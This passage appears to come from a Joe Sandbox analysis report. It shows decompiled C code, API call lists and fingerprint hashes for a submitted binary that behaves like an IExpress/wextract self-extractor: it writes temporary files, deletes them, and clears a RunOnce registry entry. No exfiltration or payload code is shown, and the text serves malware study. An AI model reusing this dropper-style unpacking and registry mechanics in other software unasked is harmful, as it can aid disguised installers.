                                                                                                                                                                                                          							 *0x869124 = 0;
                                                                                                                                                                                                          							_t14 = 1;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					E008644B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                          					L4:
                                                                                                                                                                                                          					 *0x869124 = E00866285();
                                                                                                                                                                                                          					_t14 = 0;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return _t14;
                                                                                                                                                                                                          			}














                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00865534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 008658E7
                                                                                                                                                                                                          • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00865534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00865943
                                                                                                                                                                                                          • LocalFree.KERNEL32(00000000,?,00865534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0086594D
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,00865534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0086595C
                                                                                                                                                                                                          • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00865534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00865963
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$TMP4351$.TMP
                                                                                                                                                                                                          • API String ID: 747627703-2139698323
                                                                                                                                                                                                          • Opcode ID: 2b9a1b385f27db094a41fb842e3fcdf5f2bfd569dae69ecd732aaf60f84e8924
                                                                                                                                                                                                          • Instruction ID: b716dfcf3d893496d4ffc4fc8ed0e03f7c57d5c22b2cd1c120e03b2dc33cf587
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b9a1b385f27db094a41fb842e3fcdf5f2bfd569dae69ecd732aaf60f84e8924
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 10113471600220ABC7241F79AC4DB9B7F9EFF46360F120619F50AE32C1DEB48805C6A1
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          control_flow_graph 652 8651e5-86520b call 86468f LocalAlloc 655 86522d-86523c call 86468f 652->655 656 86520d-865228 call 8644b9 call 866285 652->656 662 865262-865270 lstrcmpA 655->662 663 86523e-865260 call 8644b9 LocalFree 655->663 670 8652b0 656->670 664 865272-865273 LocalFree 662->664 665 86527e-86529c call 8644b9 LocalFree 662->665 663->670 668 865279-86527c 664->668 674 8652a6 665->674 675 86529e-8652a4 665->675 672 8652b2-8652b5 668->672 670->672 674->670 675->668
                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E008651E5(void* __eflags) {
                                                                                                                                                                                                          				int _t5;
                                                                                                                                                                                                          				void* _t6;
                                                                                                                                                                                                          				void* _t28;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t1 = E0086468F("UPROMPT", 0, 0) + 1; // 0x1
                                                                                                                                                                                                          				_t28 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                          				if(_t28 != 0) {
                                                                                                                                                                                                          					if(E0086468F("UPROMPT", _t28, _t29) != 0) {
                                                                                                                                                                                                          						_t5 = lstrcmpA(_t28, "<None>"); // executed
                                                                                                                                                                                                          						if(_t5 != 0) {
                                                                                                                                                                                                          							_t6 = E008644B9(0, 0x3e9, _t28, 0, 0x20, 4);
                                                                                                                                                                                                          							LocalFree(_t28);
                                                                                                                                                                                                          							if(_t6 != 6) {
                                                                                                                                                                                                          								 *0x869124 = 0x800704c7;
                                                                                                                                                                                                          								L10:
                                                                                                                                                                                                          								return 0;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							 *0x869124 = 0;
                                                                                                                                                                                                          							L6:
                                                                                                                                                                                                          							return 1;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						LocalFree(_t28);
                                                                                                                                                                                                          						goto L6;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					E008644B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                          					LocalFree(_t28);
                                                                                                                                                                                                          					 *0x869124 = 0x80070714;
                                                                                                                                                                                                          					goto L10;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				E008644B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                          				 *0x869124 = E00866285();
                                                                                                                                                                                                          				goto L10;
                                                                                                                                                                                                          			}







                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0086468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008646A0
                                                                                                                                                                                                            • Part of subcall function 0086468F: SizeofResource.KERNEL32(00000000,00000000,?,00862D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008646A9
                                                                                                                                                                                                            • Part of subcall function 0086468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008646C3
                                                                                                                                                                                                            • Part of subcall function 0086468F: LoadResource.KERNEL32(00000000,00000000,?,00862D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008646CC
                                                                                                                                                                                                            • Part of subcall function 0086468F: LockResource.KERNEL32(00000000,?,00862D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008646D3
                                                                                                                                                                                                            • Part of subcall function 0086468F: memcpy_s.MSVCRT ref: 008646E5
                                                                                                                                                                                                            • Part of subcall function 0086468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 008646EF
                                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00862F4D,?,00000002,00000000), ref: 00865201
                                                                                                                                                                                                          • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00865250
                                                                                                                                                                                                            • Part of subcall function 008644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00864518
                                                                                                                                                                                                            • Part of subcall function 008644B9: MessageBoxA.USER32(?,?,herso,00010010), ref: 00864554
                                                                                                                                                                                                            • Part of subcall function 00866285: GetLastError.KERNEL32(00865BBC), ref: 00866285
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                          • String ID: <None>$UPROMPT
                                                                                                                                                                                                          • API String ID: 957408736-2980973527
                                                                                                                                                                                                          • Opcode ID: 749673c12c08e511b20bfc6a76a1e857802e6df0248f4b6754157231666dfa62
                                                                                                                                                                                                          • Instruction ID: c205b1327af470fd234488771dc338c82de302d50aa0e1b94ab8770412edf395
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 749673c12c08e511b20bfc6a76a1e857802e6df0248f4b6754157231666dfa62
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D911D0B1201605BBE7146BB55D5AB3B719EFB89788F134029F742E6391EEBD8C00462A
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 74%
                                                                                                                                                                                                          			E008652B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				char _v268;
                                                                                                                                                                                                          				signed int _t9;
                                                                                                                                                                                                          				signed int _t11;
                                                                                                                                                                                                          				void* _t21;
                                                                                                                                                                                                          				void* _t29;
                                                                                                                                                                                                          				CHAR** _t31;
                                                                                                                                                                                                          				void* _t32;
                                                                                                                                                                                                          				signed int _t33;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t28 = __edi;
                                                                                                                                                                                                          				_t22 = __ecx;
                                                                                                                                                                                                          				_t21 = __ebx;
                                                                                                                                                                                                          				_t9 =  *0x868004; // 0xb82e2007
                                                                                                                                                                                                          				_v8 = _t9 ^ _t33;
                                                                                                                                                                                                          				_push(__esi);
                                                                                                                                                                                                          				_t31 =  *0x8691e0; // 0x2df8360
                                                                                                                                                                                                          				if(_t31 != 0) {
                                                                                                                                                                                                          					_push(__edi);
                                                                                                                                                                                                          					do {
                                                                                                                                                                                                          						_t29 = _t31;
                                                                                                                                                                                                          						if( *0x868a24 == 0 &&  *0x869a30 == 0) {
                                                                                                                                                                                                          							SetFileAttributesA( *_t31, 0x80); // executed
                                                                                                                                                                                                          							DeleteFileA( *_t31); // executed
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t31 = _t31[1];
                                                                                                                                                                                                          						LocalFree( *_t29);
                                                                                                                                                                                                          						LocalFree(_t29);
                                                                                                                                                                                                          					} while (_t31 != 0);
                                                                                                                                                                                                          					_pop(_t28);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t11 =  *0x868a20; // 0x0
                                                                                                                                                                                                          				_pop(_t32);
                                                                                                                                                                                                          				if(_t11 != 0 &&  *0x868a24 == 0 &&  *0x869a30 == 0) {
                                                                                                                                                                                                          					_push(_t22);
                                                                                                                                                                                                          					E00861781( &_v268, 0x104, _t22, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                          					if(( *0x869a34 & 0x00000020) != 0) {
                                                                                                                                                                                                          						E008665E8( &_v268);
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					SetCurrentDirectoryA(".."); // executed
                                                                                                                                                                                                          					_t22 =  &_v268;
                                                                                                                                                                                                          					E00862390( &_v268);
                                                                                                                                                                                                          					_t11 =  *0x868a20; // 0x0
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				if( *0x869a40 != 1 && _t11 != 0) {
                                                                                                                                                                                                          					_t11 = E00861FE1(_t22); // executed
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				 *0x868a20 =  *0x868a20 & 0x00000000;
                                                                                                                                                                                                          				return E00866CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                                                                                                                                                                          			}













                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SetFileAttributesA.KERNELBASE(02DF8360,00000080,?,00000000), ref: 008652F2
                                                                                                                                                                                                          • DeleteFileA.KERNELBASE(02DF8360), ref: 008652FA
                                                                                                                                                                                                          • LocalFree.KERNEL32(02DF8360,?,00000000), ref: 00865305
                                                                                                                                                                                                          • LocalFree.KERNEL32(02DF8360), ref: 0086530C
                                                                                                                                                                                                          • SetCurrentDirectoryA.KERNELBASE(008611FC,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00865363
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00865334
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                          • API String ID: 2833751637-2312194364
                                                                                                                                                                                                          • Opcode ID: a5f94e97cfaefb19e0b6bf88f68344f2f7ad4317c9702708ad58d07704079947
                                                                                                                                                                                                          • Instruction ID: 0d3cf67b9169ea1a218d00c450c1bce7c49d55812931b1efa1168bc0be72c6ef
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a5f94e97cfaefb19e0b6bf88f68344f2f7ad4317c9702708ad58d07704079947
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D21CF31900A24DBCB349F54EE1AB6937B4FB11B41F0B2259E986E63A0CFF45C84CB42
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E00861FE1(void* __ecx) {
                                                                                                                                                                                                          				void* _v8;
                                                                                                                                                                                                          				long _t4;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				if( *0x868530 != 0) {
                                                                                                                                                                                                          					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                                                                                                                                                                          					if(_t4 == 0) {
                                                                                                                                                                                                          						RegDeleteValueA(_v8, "wextract_cleanup0"); // executed
                                                                                                                                                                                                          						return RegCloseKey(_v8);
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return _t4;
                                                                                                                                                                                                          			}






                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,0086538C,?,?,0086538C), ref: 00862005
                                                                                                                                                                                                          • RegDeleteValueA.KERNELBASE(0086538C,wextract_cleanup0,?,?,0086538C), ref: 00862017
                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(0086538C,?,?,0086538C), ref: 00862020
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
                                                                                                                                                                                                          • API String ID: 849931509-702805525
                                                                                                                                                                                                          • Opcode ID: 53c7bb2fc812a9c7f844a199faae4e88520772b44264be2396aa4bcc0472abe8
                                                                                                                                                                                                          • Instruction ID: d9111e55a14020002a506e61199f869f496dc4e0b5b36fd27f1eef70d680144a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 53c7bb2fc812a9c7f844a199faae4e88520772b44264be2396aa4bcc0472abe8
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 10E04F30555B19FBD7258B91EC4EF597B29F700740F120295FA09F0160EBB15A14DA07
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 94%
                                                                                                                                                                                                          			E00864CD0(char* __edx, long _a4, int _a8) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				char _v268;
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				signed int _t29;
                                                                                                                                                                                                          				int _t30;
                                                                                                                                                                                                          				long _t32;
                                                                                                                                                                                                          				signed int _t33;
                                                                                                                                                                                                          				long _t35;
                                                                                                                                                                                                          				long _t36;
                                                                                                                                                                                                          				struct HWND__* _t37;
                                                                                                                                                                                                          				long _t38;
                                                                                                                                                                                                          				long _t39;
                                                                                                                                                                                                          				long _t41;
                                                                                                                                                                                                          				long _t44;
                                                                                                                                                                                                          				long _t45;
                                                                                                                                                                                                          				long _t46;
                                                                                                                                                                                                          				signed int _t50;
                                                                                                                                                                                                          				long _t51;
                                                                                                                                                                                                          				char* _t58;
                                                                                                                                                                                                          				long _t59;
                                                                                                                                                                                                          				char* _t63;
                                                                                                                                                                                                          				long _t64;
                                                                                                                                                                                                          				CHAR* _t71;
                                                                                                                                                                                                          				CHAR* _t74;
                                                                                                                                                                                                          				int _t75;
                                                                                                                                                                                                          				signed int _t76;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t69 = __edx;
                                                                                                                                                                                                          				_t29 =  *0x868004; // 0xb82e2007
                                                                                                                                                                                                          				_t30 = _t29 ^ _t76;
                                                                                                                                                                                                          				_v8 = _t30;
                                                                                                                                                                                                          				_t75 = _a8;
                                                                                                                                                                                                          				if( *0x8691d8 == 0) {
                                                                                                                                                                                                          					_t32 = _a4;
                                                                                                                                                                                                          					__eflags = _t32;
                                                                                                                                                                                                          					if(_t32 == 0) {
                                                                                                                                                                                                          						_t33 = E00864E99(_t75);
                                                                                                                                                                                                          						L35:
                                                                                                                                                                                                          						return E00866CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t35 = _t32 - 1;
                                                                                                                                                                                                          					__eflags = _t35;
                                                                                                                                                                                                          					if(_t35 == 0) {
                                                                                                                                                                                                          						L9:
                                                                                                                                                                                                          						_t33 = 0;
                                                                                                                                                                                                          						goto L35;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t36 = _t35 - 1;
                                                                                                                                                                                                          					__eflags = _t36;
                                                                                                                                                                                                          					if(_t36 == 0) {
                                                                                                                                                                                                          						_t37 =  *0x868584; // 0x0
                                                                                                                                                                                                          						__eflags = _t37;
                                                                                                                                                                                                          						if(_t37 != 0) {
                                                                                                                                                                                                          							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t54 = 0x8691e4;
                                                                                                                                                                                                          						_t58 = 0x8691e4;
                                                                                                                                                                                                          						do {
                                                                                                                                                                                                          							_t38 =  *_t58;
                                                                                                                                                                                                          							_t58 =  &(_t58[1]);
                                                                                                                                                                                                          							__eflags = _t38;
                                                                                                                                                                                                          						} while (_t38 != 0);
                                                                                                                                                                                                          						_t59 = _t58 - 0x8691e5;
                                                                                                                                                                                                          						__eflags = _t59;
                                                                                                                                                                                                          						_t71 =  *(_t75 + 4);
                                                                                                                                                                                                          						_t73 =  &(_t71[1]);
                                                                                                                                                                                                          						do {
                                                                                                                                                                                                          							_t39 =  *_t71;
                                                                                                                                                                                                          							_t71 =  &(_t71[1]);
                                                                                                                                                                                                          							__eflags = _t39;
                                                                                                                                                                                                          						} while (_t39 != 0);
                                                                                                                                                                                                          						_t69 = _t71 - _t73;
                                                                                                                                                                                                          						_t30 = _t59 + 1 + _t71 - _t73;
                                                                                                                                                                                                          						__eflags = _t30 - 0x104;
                                                                                                                                                                                                          						if(_t30 >= 0x104) {
                                                                                                                                                                                                          							L3:
                                                                                                                                                                                                          							_t33 = _t30 | 0xffffffff;
                                                                                                                                                                                                          							goto L35;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t69 = 0x8691e4;
                                                                                                                                                                                                          						_t30 = E00864702( &_v268, 0x8691e4,  *(_t75 + 4));
                                                                                                                                                                                                          						__eflags = _t30;
                                                                                                                                                                                                          						if(__eflags == 0) {
                                                                                                                                                                                                          							goto L3;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t41 = E0086476D( &_v268, __eflags);
                                                                                                                                                                                                          						__eflags = _t41;
                                                                                                                                                                                                          						if(_t41 == 0) {
                                                                                                                                                                                                          							goto L9;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_push(0x180);
                                                                                                                                                                                                          						_t30 = E00864980( &_v268, 0x8302); // executed
                                                                                                                                                                                                          						_t75 = _t30;
                                                                                                                                                                                                          						__eflags = _t75 - 0xffffffff;
                                                                                                                                                                                                          						if(_t75 == 0xffffffff) {
                                                                                                                                                                                                          							goto L3;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t30 = E008647E0( &_v268);
                                                                                                                                                                                                          						__eflags = _t30;
                                                                                                                                                                                                          						if(_t30 == 0) {
                                                                                                                                                                                                          							goto L3;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						 *0x8693f4 =  *0x8693f4 + 1;
                                                                                                                                                                                                          						_t33 = _t75;
                                                                                                                                                                                                          						goto L35;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t44 = _t36 - 1;
                                                                                                                                                                                                          					__eflags = _t44;
                                                                                                                                                                                                          					if(_t44 == 0) {
                                                                                                                                                                                                          						_t54 = 0x8691e4;
                                                                                                                                                                                                          						_t63 = 0x8691e4;
                                                                                                                                                                                                          						do {
                                                                                                                                                                                                          							_t45 =  *_t63;
                                                                                                                                                                                                          							_t63 =  &(_t63[1]);
                                                                                                                                                                                                          							__eflags = _t45;
                                                                                                                                                                                                          						} while (_t45 != 0);
                                                                                                                                                                                                          						_t74 =  *(_t75 + 4);
                                                                                                                                                                                                          						_t64 = _t63 - 0x8691e5;
                                                                                                                                                                                                          						__eflags = _t64;
                                                                                                                                                                                                          						_t69 =  &(_t74[1]);
                                                                                                                                                                                                          						do {
                                                                                                                                                                                                          							_t46 =  *_t74;
                                                                                                                                                                                                          							_t74 =  &(_t74[1]);
                                                                                                                                                                                                          							__eflags = _t46;
                                                                                                                                                                                                          						} while (_t46 != 0);
                                                                                                                                                                                                          						_t73 = _t74 - _t69;
                                                                                                                                                                                                          						_t30 = _t64 + 1 + _t74 - _t69;
                                                                                                                                                                                                          						__eflags = _t30 - 0x104;
                                                                                                                                                                                                          						if(_t30 >= 0x104) {
                                                                                                                                                                                                          							goto L3;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t69 = 0x8691e4;
                                                                                                                                                                                                          						_t30 = E00864702( &_v268, 0x8691e4,  *(_t75 + 4));
                                                                                                                                                                                                          						__eflags = _t30;
                                                                                                                                                                                                          						if(_t30 == 0) {
                                                                                                                                                                                                          							goto L3;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                                                                                                                                                                                                          						_t30 = E00864C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                                                                                                                                                                                                          						__eflags = _t30;
                                                                                                                                                                                                          						if(_t30 == 0) {
                                                                                                                                                                                                          							goto L3;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						E00864B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                                                                                                                                                                                                          						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                                                                                                                                                                                                          						__eflags = _t50;
                                                                                                                                                                                                          						if(_t50 != 0) {
                                                                                                                                                                                                          							_t51 = _t50 & 0x00000027;
                                                                                                                                                                                                          							__eflags = _t51;
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							_t51 = 0x80;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                                                                                                                                                                                                          						__eflags = _t30;
                                                                                                                                                                                                          						if(_t30 == 0) {
                                                                                                                                                                                                          							goto L3;
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							_t33 = 1;
                                                                                                                                                                                                          							goto L35;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t30 = _t44 - 1;
                                                                                                                                                                                                          					__eflags = _t30;
                                                                                                                                                                                                          					if(_t30 == 0) {
                                                                                                                                                                                                          						goto L3;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					goto L9;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				if(_a4 == 3) {
                                                                                                                                                                                                          					_t30 = E00864B60( *((intOrPtr*)(_t75 + 0x14)));
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				goto L3;
                                                                                                                                                                                                          			}































                                                                                                                                                                                                          0x00864e38
                                                                                                                                                                                                          0x00864e3a
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00864e40
                                                                                                                                                                                                          0x00864e51
                                                                                                                                                                                                          0x00864e56
                                                                                                                                                                                                          0x00864e5b
                                                                                                                                                                                                          0x00864e5e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00864e6a
                                                                                                                                                                                                          0x00864e6f
                                                                                                                                                                                                          0x00864e71
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00864e77
                                                                                                                                                                                                          0x00864e7d
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00864e7d
                                                                                                                                                                                                          0x00864d25
                                                                                                                                                                                                          0x00864d25
                                                                                                                                                                                                          0x00864d28
                                                                                                                                                                                                          0x00864d36
                                                                                                                                                                                                          0x00864d3b
                                                                                                                                                                                                          0x00864d40
                                                                                                                                                                                                          0x00864d40
                                                                                                                                                                                                          0x00864d42
                                                                                                                                                                                                          0x00864d43
                                                                                                                                                                                                          0x00864d43
                                                                                                                                                                                                          0x00864d47
                                                                                                                                                                                                          0x00864d4a
                                                                                                                                                                                                          0x00864d4a
                                                                                                                                                                                                          0x00864d4c
                                                                                                                                                                                                          0x00864d4f
                                                                                                                                                                                                          0x00864d4f
                                                                                                                                                                                                          0x00864d51
                                                                                                                                                                                                          0x00864d52
                                                                                                                                                                                                          0x00864d52
                                                                                                                                                                                                          0x00864d56
                                                                                                                                                                                                          0x00864d5b
                                                                                                                                                                                                          0x00864d5d
                                                                                                                                                                                                          0x00864d62
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00864d67
                                                                                                                                                                                                          0x00864d6f
                                                                                                                                                                                                          0x00864d74
                                                                                                                                                                                                          0x00864d76
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00864d7c
                                                                                                                                                                                                          0x00864d84
                                                                                                                                                                                                          0x00864d89
                                                                                                                                                                                                          0x00864d8b
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00864d94
                                                                                                                                                                                                          0x00864d99
                                                                                                                                                                                                          0x00864d9e
                                                                                                                                                                                                          0x00864da1
                                                                                                                                                                                                          0x00864daa
                                                                                                                                                                                                          0x00864daa
                                                                                                                                                                                                          0x00864da3
                                                                                                                                                                                                          0x00864da3
                                                                                                                                                                                                          0x00864da3
                                                                                                                                                                                                          0x00864db5
                                                                                                                                                                                                          0x00864dbb
                                                                                                                                                                                                          0x00864dbd
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00864dc3
                                                                                                                                                                                                          0x00864dc5
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00864dc5
